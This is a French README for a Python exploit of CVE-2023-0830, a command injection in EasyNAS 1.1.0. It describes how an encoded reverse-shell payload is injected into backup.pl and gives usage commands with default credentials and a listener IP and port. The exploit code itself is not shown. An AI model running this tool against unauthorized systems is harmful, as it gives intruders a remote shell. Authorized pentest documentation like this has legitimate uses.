
Exploit pour EasyNAS version 1.1.0. La vulnérabilité exploitée est une faille d'injection de commandes, qui nécessite une authentification.
Ce script Python est un exploit puissant pour EasyNAS version 1.1.0 avec des fonctionnalités améliorées, incluant un écouteur intégré. La vulnérabilité exploitée est une faille d'injection de commandes, qui nécessite une authentification.
Le script établit une session avec le serveur cible, puis envoie une demande de connexion avec les identifiants fournis par l'utilisateur. Après une authentification réussie, le script construit une charge utile qui, lorsqu'elle est exécutée, ouvre une connexion reverse shell vers une IP et un port spécifiés par l'utilisateur. Cette charge utile est encodée en URL et en Base64, puis injectée dans le fichier backup.pl sur le serveur via une requête GET conçue.
Ivan Spiridonov (xbz0n) https://xbz0n.sh
python3 CVE-2023-0830-v2.py 192.168.0.108:1443 admin admin
python3 CVE-2023-0830-v2.py 192.168.0.108:1443 admin admin --mode reverse --lhost 192.168.0.100 --lport 4444
--mode {shell,reverse} Mode d'exploitation : shell (reverse shell intégré) ou reverse (écouteur externe)
--lhost IP_ADDRESS Adresse IP pour l'écouteur reverse shell (détectée automatiquement par défaut)
--lport PORT Port pour l'écouteur reverse shell (par défaut : 4444)
--protocol {http,https} Protocole à utiliser (par défaut : https)
--verbose Activer la sortie verbose
--shell {bash,sh,python} Spécifier le type de shell à utiliser avec l'écouteur intégré (par défaut : bash)
Ce script est destiné uniquement à des fins éducatives et à des tests d'intrusion autorisés. Demandez toujours une autorisation explicite avant d'effectuer des tests d'intrusion contre un réseau ou un système.
Veuillez l'utiliser de manière responsable.